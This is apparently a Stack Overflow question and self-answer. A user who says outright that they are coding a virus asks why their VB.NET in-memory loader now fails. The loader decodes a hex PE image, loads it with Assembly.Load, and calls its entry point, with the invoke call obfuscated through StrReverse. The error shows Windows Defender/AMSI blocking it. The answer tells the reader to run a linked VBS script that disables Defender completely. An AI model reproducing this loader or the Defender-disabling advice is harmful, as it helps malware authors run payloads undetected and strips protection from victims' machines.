Operation did not complete successfully because the file contains a virus or potentially unwanted software. (Exception from HRESULT: 0x800700E1)

3

Guys I have problem while coding in vb.net in visual studio. Here's my code which will convert .EXE file Hex to byte and directly run from memory.

Imports System.Linq,System.Reflection
              Public Module Module1
                     Public Sub Main()
                                 Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
                                 Dim q1 As Object = Assembly.Load(HexToByte(n))
                                 Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
                                 Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)

                     End Sub
                     Public Function HexToByte(ByVal str As String) As Byte()
                                 Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
                                 Return xData
                     End Function
             End Module

When I debug it using F5 key, it shows full message as below:

System.BadImageFormatException: 
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. 
An attempt was made to load a program with an incorrect format.'

And also

Inner Exeception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software. 
(Exception from HRESULT: 0x800700E1)

Guys as these messages states that I am coding a virus and also it is true.
But I have using this code a lot of times but it didn't return any exception.
But now it is doesn't allows me. How to fix that thing ???

vb.net
visual-studio
memory
virus
asked on Stack Overflow Dec 23, 2019 by Sorry IwontTell

1 Answer

0

As it mentions that it contains a virus,
So probably AMSI(Win Defender Component) is blocking the virus from being running,

As this error message also occurs in powershell when executing malicious command,
And hence AMSI stops it, info taken from 0x00-0x00.github.io enter image description here

Run this VBS script to disable defender completely,
https://github.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/blob/master/script.vbs

answered on Stack Overflow Jul 31, 2020 by Sorry IwontTell

User contributions licensed under CC BY-SA 3.0